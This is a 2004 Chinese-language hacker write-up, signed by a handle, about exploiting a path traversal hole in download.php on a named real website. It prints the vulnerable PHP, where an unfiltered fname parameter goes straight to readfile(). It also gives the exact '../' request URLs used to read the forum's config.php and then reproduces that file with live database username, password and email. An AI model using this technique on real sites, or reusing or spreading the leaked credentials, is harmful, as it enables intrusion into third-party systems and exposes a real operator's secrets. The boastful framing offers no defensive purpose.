by ≯Super·Hei (sex.cnse8.com) 2004-3-31
问题出在下载系统的download.php
我们访问：http://www.cnwill.com/soft/download.php?fname=./www.ChinaSafe.org.txt

呵呵 ！！ 看到./你会想到什么 :)

http://www.cnwill.com/soft/download.php?fname=./www.ChinaSafe.org.txt

返回：
<br />
<b>Warning</b>: readfile(): Unable to access ../www.ChinaSafe.org.txt in <b>/usr/home/cnwill/soft/download.php</b> on line <b>35</b><br />
<br />
<b>Warning</b>: readfile(../www.ChinaSafe.org.txt): failed to open stream: Invalid argument in <b>/usr/home/cnwill/soft/download.php</b> on line <b>35</b><br />

看来使用的是readfile()，去下个原文件看看先。download.php代码：

$extensie = strrchr($_GET['fname'], ".");

if (!in_array(substr($extensie, 1), $not_to_be_dloaded)) {
// the source file is output
readfile($_GET['fname']);
} else {
// message when downloading a forbidden file
echo "$msg_not_allowed";
}

?>

对fname没有过滤.和/ 看来我们可以readfile所有的文件拉 哈哈~~~

目标得到论坛config.php，呵呵~~ 其他的好象都是文本数据的 。
看看论坛 Powered by: vBulletin Version 2.2.8
提交http://www.cnwill.com/forum/readme.txt 返回readme.txt的内容，看来存在readme.txt

我们回到download.php，提交：
http://www.cnwill.com/soft/download.php?fname=./../forum/readme.txt 哈哈!!
成功返回 胜利就在眼前拉。

提交http://www.cnwill.com/soft/download.php?fname=./../forum/admin/config.php

哈哈 出现个下载提示，用网快下载后打开：

<?php

/////////////////////////////////////////////////////////////
// Please note that if you get any errors when connecting, //
// that you will need to email your host as we cannot tell //
// you what your specific values are supposed to be //
/////////////////////////////////////////////////////////////

// type of database running
// (only mysql is supported at the moment)
$dbservertype='mysql';

// hostname or ip of server
$servername='localhost';

// username and password to log onto db server
$dbusername='cnwill';
$dbpassword='54safer';

// name of database
$dbname='cnwill';

// technical email address - any error messages will be emailed here
$technicalemail='54safer@163.com';

// use persistant connections to the database
// 0 = don't use
// 1 = use
$usepconnect=0;

?>